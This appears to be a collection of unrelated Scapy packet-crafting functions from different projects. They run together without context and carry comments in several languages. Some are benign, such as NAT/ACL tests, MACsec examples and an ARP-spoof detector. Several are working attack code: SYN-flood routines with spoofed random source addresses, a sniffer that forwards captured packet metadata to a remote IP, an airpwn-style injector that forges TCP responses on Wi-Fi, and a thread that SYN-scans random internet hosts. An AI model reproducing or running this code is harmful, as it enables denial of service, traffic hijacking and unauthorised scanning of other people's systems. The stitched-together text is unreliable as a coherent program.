def handle_packet(packet): if packet[IP].dst == LOCAL_IP and packet[IP].src == SENDER_IP: global counter counter = counter + 1 ip_src = packet[IP].src ip_dst = packet[IP].dst s_port = packet[TCP].sport d_port = packet[TCP].dport tcp_flags = str(packet[TCP].flags) js = { "ip_src": ip_src, "ip_dst": ip_dst, "s_port": s_port, "d_port": d_port, "tcp_flags": tcp_flags } global payload payload = payload + "-TMA-" + json.dumps(js) print(payload) if counter >= 5: send(IP(dst=REMOTE_IP) / TCP(dport=8000) / Raw(load=payload)) counter = 0 payload = ""
def attackTarget(self, port, numSyn): # check argument types if not (isinstance(port, int) and isinstance(numSyn, int)): raise TypeError("Error! Parameters must be integers") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.1) # check if port is open try: sock.connect((self.targetIP, port)) # otherwise, return 0 except: return 0 # If the port is open, attack it for i in range( numSyn): # sends a number of SYN packets equal to numSyn # set up packet IP_header = IP(src=self.spoofIP, dst=self.targetIP) TCP_header = TCP(flags="S", sport=RandShort(), dport=port) packet = IP_header / TCP_header # attempt to send packet; it will a message if it succeeded try: send(packet) # if failed, print exception except Exception as e: print(e) # returns 1 since port is open, even if packets failed to send return 1
def SYN_TCP_Flood(self, dstIP, dstPort, counter): try: total = 0 print("Packets are sending ...") for x in range(0, int(counter)): s_port = random.randint(1000, 9000) s_eq = random.randint(1000, 9000) w_indow = random.randint(1000, 9000) IP_Packet = IP() IP_Packet.src = ".".join( map(str, (random.randint(0, 255) for _ in range(4)))) IP_Packet.dst = dstIP # Created our own TCP packet TCP_Packet = TCP() TCP_Packet.sport = s_port TCP_Packet.dport = int(dstPort) TCP_Packet.flags = "S" TCP_Packet.seq = s_eq TCP_Packet.window = w_indow send(IP_Packet / TCP_Packet, verbose=0) total += 1 print("\nTotal packets sent: %i\n" % total) print() return 1 except: return 0
def create_stream_out(self, out_if, dst_ip=None, ttl=64): """ Create packet stream for outside network :param out_if: Outside interface :param dst_ip: Destination IP address (Default use global NAT address) :param ttl: TTL of generated packets """ if dst_ip is None: dst_ip = self.nat_addr pkts = [] # TCP p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) / IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) / TCP(dport=self.tcp_port_out, sport=self.tcp_external_port)) pkts.append(p) # UDP p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) / IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) / UDP(dport=self.udp_port_out, sport=self.udp_external_port)) pkts.append(p) # ICMP p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) / IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) / ICMP(id=self.icmp_external_id, type='echo-reply')) pkts.append(p) return pkts
def main(): """ Main function """ x = Ether() / IP(dst="www.secdev.org") / TCP() print(x.summary()) print(x.show()) data = 'test_MACsec' pkt = Ether(dst="00:00:01:00:00:01", src="00:10:94:00:00:02") / MACsec() / data sendp(pkt, iface="en0", count=400) print(pkt.summary()) print(pkt.show()) sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/IP(src='192.168.0.1', dst='192.168.0.2')/ICMP(type='echo-request') / \ "1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890" m = sa.encap(p) print(m.type == ETH_P_MACSEC) print(m[MACsec].type == ETH_P_IP) print(len(m) == len(p) + 16) print(m[MACsec].an == 0) print(m[MACsec].pn == 100) print(m[MACsec].shortlen == 0) print(m[MACsec].SC) print(m[MACsec].E) print(m[MACsec].C) print(m[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01') print(p.show())
def tcpRequest(self, flags='PA', **kwargs): # {{{ """ Get an IP base request @param dport: the destination port @param sport: the source port @param flags: the flags request (default PA) @param seq: the sequence (optional) @param ack: the ack number """ dicttcp = {} if not self._hasPort(**kwargs): raise seq = random.randint(1000000, 16000000) dicttcp['dport'] = int(kwargs['port']) dicttcp['sport'] = random.randint(1024, 65535) dicttcp['seq'] = kwargs['seq'] if 'seq' in kwargs else seq if self.__isKeyDict(_l='flags', **kwargs): dicttcp['flags'] = kwargs['flags'] if self.isKeyDict(_l=['ack'], **kwargs): dicttcp['ack'] = kwargs['ack'] if self.options['SRCPORT'][0]: if self.isValidPort( port=self.options['SRCPORT'][0], interface=kwargs['interface'] ): dicttcp['sport'] = self.options['SRCPORT'][0] return TCP(**dicttcp)
def test_iacl_proto_tcp_dport(self): """ TCP destination port iACL test Test scenario for basic protocol ACL with TCP and dport - Create IPv4 stream for pg0 -> pg1 interface. - Create iACL with TCP IP protocol and defined dport. - Send and verify received packets on pg1 interface. """ # Basic iACL testing with TCP and dport dport = 427 pkts = self.create_stream(self.pg0, self.pg1, self.pg_if_packet_sizes, TCP(sport=1234, dport=dport)) self.pg0.add_stream(pkts) key = 'proto_tcp_sport' self.create_classify_table( key, self.build_ip_mask(proto='ff', dst_port='ffff')) self.create_classify_session( self.acl_tbl_idx.get(key), self.build_ip_match(proto=socket.IPPROTO_TCP, dst_port=dport)) self.input_acl_set_interface( self.pg0, self.acl_tbl_idx.get(key)) self.acl_active_table = key self.pg_enable_capture(self.pg_interfaces) self.pg_start() pkts = self.pg1.get_capture(len(pkts)) self.verify_capture(self.pg1, pkts, TCP) self.pg0.assert_nothing_captured(remark="packets forwarded") self.pg2.assert_nothing_captured(remark="packets forwarded") self.pg3.assert_nothing_captured(remark="packets forwarded")
def test_max_translations_per_user(self): """ MAX translations per user - recycle the least recently used """ self.snat_add_address(self.snat_addr) self.vapi.snat_interface_add_del_feature(self.pg0.sw_if_index) self.vapi.snat_interface_add_del_feature(self.pg1.sw_if_index, is_inside=0) # get maximum number of translations per user snat_config = self.vapi.snat_show_config() # send more than maximum number of translations per user packets pkts_num = snat_config.max_translations_per_user + 5 pkts = [] for port in range(0, pkts_num): p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) / IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) / TCP(sport=1025 + port)) pkts.append(p) self.pg0.add_stream(pkts) self.pg_enable_capture(self.pg_interfaces) self.pg_start() # verify number of translated packet self.pg1.get_capture(pkts_num)
def restart(self, rprob, sport): """Restarts all class properties to their initial state.""" self.listen_thread = None # Listener thread for incoming packets self.sport = sport # Source port self.state = State.LISTEN # TCP State self.seq = random.randrange(0, 2**32) # Sequence number self.ack = 0 # ACK number self.ack_flag = False self.ack_event.clear() self.end_event.clear() self.psh_event.clear() self.out_pkt = IP() / TCP( sport=sport, seq=self.seq) # Scapy packet with TCP segment self.ingress_buffer = b'' # Buffer for ingress binary data self.transfer_end = False # RSTEG properties self.retrans_prob = rprob # Probability for fake retransmission self.secret_sent = False # Flag for secret delivery (client side) self.secret_wait = False # Flag for secret delivery (server side) self.secret_signal = False # Flag for secret delivery signal self.secret_chunks = None # Buffer for RSTEG secret binary data (client side) self.ingress_secret_buffer = b'' # Buffer for RSTEG secret binary data (server side) self.last_payload = None # Store the payload of the signal segment (for the next checksum) self.rt_seq = 0 self.secret_endtime = None # RTO properties self.timer = time.time() self.rtt = 0 self.start_time = 0
def start_tcp(target_ip, target_port): global sport, s_seq, d_seq #主要是用于TCP3此握手建立连接后继续发送数据 try: #第一次握手,发送SYN包 ans = sr1(IP(dst=target_ip) / TCP( dport=target_port, sport=RandShort(), seq=RandInt(), flags='S'), verbose=False) sport = ans[TCP].dport #源随机端口 s_seq = ans[TCP].ack #源序列号(其实初始值已经被服务端加1) d_seq = ans[TCP].seq + 1 #确认号,需要把服务端的序列号加1 #第三次握手,发送ACK确认包 send(IP(dst=target_ip) / TCP( dport=target_port, sport=sport, ack=d_seq, seq=s_seq, flags='A'), verbose=False) except Exception as e: print(e)
def SYN_Flood(targetIP, targetPort, counter): total = 0 # total number of packets sent to the target print "Packets are being sent to the target ..." for x in range(0, counter): s_port = randInt() s_eq = randInt() w_indow = randInt() # randomly generate all of these values (s_port, s_eq, w_indow using randInt() function IP_Packet = IP() IP_Packet.src = randomIP() # randomly generate IP address to be sending packets from IP_Packet.dst = targetIP TCP_Packet = TCP() TCP_Packet.sport = s_port TCP_Packet.dport = targetPort TCP_Packet.flags = "S" TCP_Packet.seq = s_eq TCP_Packet.window = w_indow send(IP_Packet / TCP_Packet, verbose=0) total += 1 sys.stdout.write("\nTotal packets sent to target : %i\n" % total)
def portScanner(): packet = IP(dst="192.168.43.77") / TCP(dport=(1, 100), flags="S") res, unans = sr(packet, timeout=1) for a in res: if a[1][1].flags == 18: print(a[1].sport)
def cmd_tcpip(ip_src, ip_dst, TOS, ttl, id, reserved, seq_num, window, urg_ptr, flags, payload, src_port): layer3 = IP() layer3.src = ip_src layer3.dst = ip_dst tos_num = int(TOS, 2) print(tos_num) layer3.tos = tos_num layer3.ttl = ttl layer3.ihl = 5 layer3.id = id layer4 = TCP() layer4.dport = 80 layer4.sport = src_port num = int(reserved, 2) binary_num = bin(num) print(binary_num) layer4.reserved = num # layer4.flags = "S" layer4.flags = flags layer4.window = window layer4.urgptr = int(urg_ptr, 2) layer4.seq = seq_num print("1") if not payload: pkt = layer3 / layer4 else: pkt = layer3 / layer4 / payload send(pkt)
def __create_packet(args, interface): logger.info('Send to destination - [%s] on interface - [%s]', args.destination, interface) src_mac = args.src_mac if not src_mac: src_mac = get_if_hwaddr(interface) logger.info('Device mac - [%s]', src_mac) ip_ver = 4 ip_addr = ipaddress.ip_address(args.destination) logger.info('Destination IP addr [%s] ([%s]) type - [%s]', args.destination, args.destination, ip_addr.__class__) if isinstance(ip_addr, ipaddress.IPv6Address): ip_ver = 6 logger.info('IP version is - [%s]', ip_ver) if args.int_hdr_file: pkt = __gen_int_pkt(args=args, ip_ver=ip_ver, src_mac=src_mac) else: pkt = __gen_std_pkt(args=args, ip_ver=ip_ver, src_mac=src_mac) if args.protocol == 'TCP': logger.info('Generating a TCP packet') pkt = pkt / TCP(dport=args.port, sport=args.source_port) elif args.protocol == 'UDP': logger.info('Generating a UDP packet') pkt = pkt / UDP(dport=args.port, sport=args.source_port) logger.info('Packet to emit - [%s]', pkt.summary()) return pkt / args.msg
def create_tcp_ipv4_frame(self, ip_id, src_ip_addr, dst_ip_addr, frame_size, src_mac_addr='00:00:0A:00:0B:00', dst_mac_addr='00:00:0A:00:0A:00'): payload_size = frame_size - HEADER_SIZE['eth'] - HEADER_SIZE['ip'] -\ HEADER_SIZE['tcp'] - \ len(TestIPPipeline.payload_watermark) if payload_size < 0: payload_size = 0 frame = Ether() / IP() / TCP( flags="") / (TestIPPipeline.payload_watermark + "X" * payload_size) frame[Ether].src = src_mac_addr frame[Ether].dst = dst_mac_addr frame[IP].src = src_ip_addr frame[IP].dst = dst_ip_addr frame[IP].id = ip_id # TCP ports always 0 frame[TCP].sport = 0 frame[TCP].dport = 0 return frame
def setUp(self) -> None: eq = parse_equation("1,2,3") # f(x) = x + 2(x ^ 2) + 3 dev_eq = parse_equation("0") # f(x) = 0 layer = "UDP" self.signature = TrafficLayerFrequencySignature(eq, dev_eq, layer) self.trigger_packet = Ether() / IP() / UDP(dport=80) self.no_trigger_packet = Ether() / IP() / TCP(dport=80)
def SYN_Flood(t_ip, t_port): print("Пакеты отправляются") global stop_thread stop_thread = True while stop_thread: global packets ip_p = IP() ip_p.src = randomIP() # записываем в поле ip источника случайный ip #ip_p.src = "8.8.8.8" ip_p.dst = t_ip # записываем ip сервера tcp_p = TCP() #tcp_p.sport = 234 tcp_p.sport = randint( 0, 6000) # записываем в поле port источника случайный port tcp_p.dport = t_port # записываем port сервер tcp_p.flags = "S" # устанавливаем флаг SYN tcp_p.seq = randint(0, 9000) # устанавливаем случайный порядковый номер ? tcp_p.window = randint(5000, 8191) # устанавливаем случайное окно ? send(ip_p / tcp_p, verbose=False) # отправляем пакет packets += 1 myapp.ui.packetsCount.setText(str(packets)) # print("Пакет {0} отправлен".format(i + 1)) packets = 0 myapp.ui.packetsCount.setText(str(packets))
def test_simple_dict_get_second_element(self): packet = (Ether(dst="ff:ff:ff:ff:ff:ff", src="00:00:00:00:00:00") / IP(src="0.0.0.0", dst="127.0.0.1") / TCP()) packet_result = { "IP": { "frag": 0, "src": "0.0.0.0", "proto": 6, "tos": 0, "dst": "127.0.0.1", "chksum": None, "len": None, "options": [], "version": 4, "flags": None, "ihl": None, "ttl": 64, "id": 1, } } to_dict_result = to_dict(packet, layer=1) # layer 1 is IP self.assertTrue(isinstance(to_dict_result, dict)) self.assertEqual(to_dict_result, packet_result)
def scan_port_thread(port, count, verbose): syn = 0x02 syn_ack = 0x12 # While we need more results while True: # generate new IP ip = str(random.randint(1, 255)) + "." + str(random.randint( 0, 255)) + "." + str(random.randint(0, 255)) + "." + str( random.randint(0, 255)) if not ipaddress.IPv4Address(ip).is_global: continue # Randomize source port srcport = randint(1, 1024) # send and receive response = sr1(IP(dst=ip) / TCP(sport=srcport, dport=port, flags=syn), timeout=2, verbose=0) # if response is not valid if response is None or not response.haslayer(TCP): continue # get TCP flags response_flags = response.getlayer(TCP).flags # if port is open if response_flags == syn_ack: check_options(ip, verbose)
def scan_port(target, port, verbose): srcport = randint(1, 1024) syn = 0x02 syn_ack = 0x12 rst_ack = 0x14 response = sr1(IP(dst=target) / TCP(sport=srcport, dport=port, flags=syn), timeout=1, verbose=0) if response is None: if verbose: print("[-] [{}:{}] is filtered or host is down.".format( target, port)) return "F" try: response_flags = response.getlayer(TCP).flags if response_flags == syn_ack: if verbose: print("[+] [{}:{}] is open (flags = SYN + ACK).".format( target, port)) return "O" else: if response_flags == rst_ack: if verbose: print("[-] [{}:{}] is closed (flags= RST + ACK).".format( target, port)) return "C" # sometimes without try-except block [response = None] arrive here, so return "filtered" except AttributeError: if verbose: print("[-] [{}:{}] is Filtered or host is down.".format( target, port)) return "F"
def create_stream_in(self, in_if, out_if, ttl=64): """ Create packet stream for inside network :param in_if: Inside interface :param out_if: Outside interface :param ttl: TTL of generated packets """ pkts = [] # TCP p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) / IP(src=in_if.remote_ip4, dst=out_if.remote_ip4, ttl=ttl) / TCP(sport=self.tcp_port_in, dport=self.tcp_external_port)) pkts.append(p) # UDP p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) / IP(src=in_if.remote_ip4, dst=out_if.remote_ip4, ttl=ttl) / UDP(sport=self.udp_port_in, dport=self.udp_external_port)) pkts.append(p) # ICMP p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) / IP(src=in_if.remote_ip4, dst=out_if.remote_ip4, ttl=ttl) / ICMP(id=self.icmp_id_in, type='echo-request')) pkts.append(p) return pkts
def generate_someip_based_tcp(self, s_ip, d_ip, s_port, d_port, seq=2496318543, ack=594476641, flags="PA", matrix=None): vlan = Dot1Q(vlan=4) ip = IP(src=s_ip, dst=d_ip) tcp = TCP(flags=flags, sport=s_port, dport=d_port, seq=seq, ack=ack) if flags == "PA": # PSH+ACK if matrix is None: matrix = {} srv_id = matrix.get("srv_id", 0xffff) method_id = matrix.get("method_id", 65535) session_id = matrix.get("session_id", 1) msg_type = matrix.get("msg_type", SOMEIP.TYPE_NOTIFICATION) req_data = matrix.get("req_data", []) someip = SOMEIP(srv_id=srv_id, sub_id=0x0, method_id=method_id, event_id=0, client_id=method_id, session_id=session_id, msg_type=msg_type) packet = b''.join([bytes().fromhex(i) for i in req_data]) target = ip / tcp / someip / packet elif flags == "A": # ACK target = ip / tcp else: target = ip / tcp payload_length = len(target) hex_target = hexdump(target, True) results = hex_target.split("\n") finalResult = [] for item in results: finalResult.append(item.split(" ")[1]) x = " ".join(finalResult) x_list = x.split(" ") return payload_length, x_list
def spoof_detection(pkt): """ Spoof Detection Engine module: This is the main detection engine. :param pkt: :return: """ ip_ = pkt[ARP].psrc t = datetime.datetime.now() mac = pkt[0][ARP].hwsrc # If the reply is an answer for an ARP request message, i.e. Full Cycle, check if the source is genuine by # sending a TCP SYN if ip_ in ARP_REQ_TABLE.keys() and (t - ARP_REQ_TABLE[ip_]).total_seconds() <= 5: ip = IP(dst=ip_) SYN = TCP(sport=40508, dport=40508, flags="S", seq=12345) E = Ether(dst=mac) # If we don't receive a TCP ACK, we raise an alarm message if not srp1(E / ip / SYN, verbose=False, timeout=2): alarm('No TCP ACK, fake IP-MAC pair') # If we receive a TCP ACK, we add the ip and mac pair to our IP_MAC_PAIRS table else: IP_MAC_PAIRS[ip_] = pkt[ARP].hwsrc # If the message is an ARP reply without an ARP request message, i.e. Half Cycle, send an ARP request for the IP # of the source, thus causing the real owner of the IP on the network respond with an ARP reply so we can treat # it as a Full Cycle. else: send(ARP(op=1, pdst=ip_), verbose=False)
def scan_port(src_ip, ip, port, interface): src_port = RandNum(1024, 65535) syn = TCP(sport=src_port, dport=port, flags="S") rst = TCP(sport=src_port, dport=port, flags="R") ip_data = IP(src=src_ip, dst=ip) p = sr1(ip_data / syn, timeout=2, verbose=False, iface=interface) if p: flags = p.getlayer(TCP).flags if flags == 0x12: send = sr1(ip_data / rst, timeout=2, verbose=False, iface=interface) return True return False
def _raise_alarm(alarm_event, olt, egress): try: frame = Ether() / Dot1Q(vlan=4000) / IP() / TCP() / Raw(load=json.dumps(alarm_event)) egress(0, frame) except Exception as e: log.exception('failed-to-raise-alarm', e=e)
def xmas_scan(self, ip, sport, dport): """ Perform a XMAS scan """ XMAS = TCP(sport=sport, dport=dport, flags='FPU') XMAS_SCAN = sr1(ip/XMAS, timeout=self.timeout, verbose=False) # If no response, port is open | filtered if not XMAS_SCAN: return 'open | filtered' else: if XMAS_SCAN.haslayer(TCP): flags = XMAS_SCAN.getlayer(TCP).flags # If response is RST, port is closed if flags == self.RST or flags == self.RSTACK: return 'closed' elif XMAS_SCAN.haslayer(ICMP): ICMP_type = XMAS_SCAN.getlayer(ICMP).type ICMP_code = XMAS_SCAN.getlayer(ICMP).code # If response is ICMP error, port is filtered if ICMP_type == 3 and int(ICMP_code) in [1,2,3,9,10,13]: return 'filtered' else: return None else: return None
def nmap_sig(target, oport=80, cport=81, ucport=1): res = {} tcpopt = [("WScale", 10), ("NOP", None), ("MSS", 256), ("Timestamp", (123, 0))] tests = [ IP(dst=target, id=1) / TCP(seq=1, sport=5001 + i, dport=oport if i < 4 else cport, options=tcpopt, flags=flags) for i, flags in enumerate(["CS", "", "SFUP", "A", "S", "A", "FPU"]) ] tests.append(IP(dst=target) / UDP(sport=5008, dport=ucport) / (300 * "i")) ans, unans = sr(tests, timeout=2) ans.extend((x, None) for x in unans) for snd, rcv in ans: if snd.sport == 5008: res["PU"] = (snd, rcv) else: test = "T%i" % (snd.sport - 5000) if rcv is not None and ICMP in rcv: warning("Test %s answered by an ICMP", test) rcv = None res[test] = rcv return nmap_probes2sig(res)
def ack_scan(self, ip, sport, dport): """ Perform an ACK scan """ ACK = TCP(dport=dport, flags='A') ACK_SCAN = sr1(ip/ACK, timeout=self.timeout, verbose=False) if not ACK_SCAN: return None else: if ACK_SCAN.haslayer(TCP): flags = ACK_SCAN.getlayer(TCP).flags # If response is RST, port is unfiltered if flags == self.RST or flags == self.RSTACK: return 'unfiltered' elif ACK_SCAN.haslayer(ICMP): ICMP_type = ACK_SCAN.getlayer(ICMP).type ICMP_code = ACK_SCAN.getlayer(ICMP).code # If response is ICMP error, port is filtered if ICMP_type == 3 and int(ICMP_code) in [1,2,3,9,10,13]: return 'filtered' else: return None else: return None
def do_airpwn(p, ifto=ifto, replace=replace, ptrn=ptrn, iptrn=iptrn): if not isinstance(p,Dot11): return if not p.FCfield & 1: return if not p.haslayer(TCP): return ip = p.getlayer(IP) tcp = p.getlayer(TCP) pay = raw(tcp.payload) if not ptrn.match(pay): return if iptrn.match(pay): return del(p.payload.payload.payload) p.FCfield="from-DS" p.addr1,p.addr2 = p.addr2,p.addr1 q = p.copy() p /= IP(src=ip.dst,dst=ip.src) p /= TCP(sport=tcp.dport, dport=tcp.sport, seq=tcp.ack, ack=tcp.seq+len(pay), flags="PA") q = p.copy() p /= replace q.ID += 1 q.getlayer(TCP).flags="RA" q.getlayer(TCP).seq+=len(replace) sendp([p,q], iface=ifto, verbose=0) print(p.sprintf("Sent %IP.src%:%IP.sport% > %IP.dst%:%TCP.dport%"))
def _apply_tcp(self): fields = {} fields['sport'] = int(self.packet.tcp.source_port.value) fields['dport'] = int(self.packet.tcp.destination_port.value) fields['ack'] = int(self.packet.tcp.acknowledgement_number) fields['seq'] = int(self.packet.tcp.sequence_number) fields['urgptr'] = int(self.packet.tcp.urgent_pointer) fields['window'] = int(self.packet.tcp.window) fields['dataofs'] = int(self.packet.tcp.header_length) if self.packet.tcp.valid_checksum == TGEnums.CHECKSUM_MODE.OVERRIDE: chksum = int(self.packet.tcp.custom_checksum) fields['chksum'] = chksum elif self.packet.tcp.valid_checksum == TGEnums.CHECKSUM_MODE.INVALID: fields['chksum'] = 65534 flags_list = [] if self.packet.tcp.flag_acknowledge_valid: flags_list.append("A") if self.packet.tcp.flag_no_more_data_from_sender: flags_list.append("F") if self.packet.tcp.flag_push_function: flags_list.append("P") if self.packet.tcp.flag_reset_connection: flags_list.append("R") if self.packet.tcp.flag_synchronize_sequence: flags_list.append("S") if self.packet.tcp.flag_urgent_pointer_valid: flags_list.append("U") fields['flags'] = flags_list self._scapy_packet = self._scapy_packet / TCP(**fields)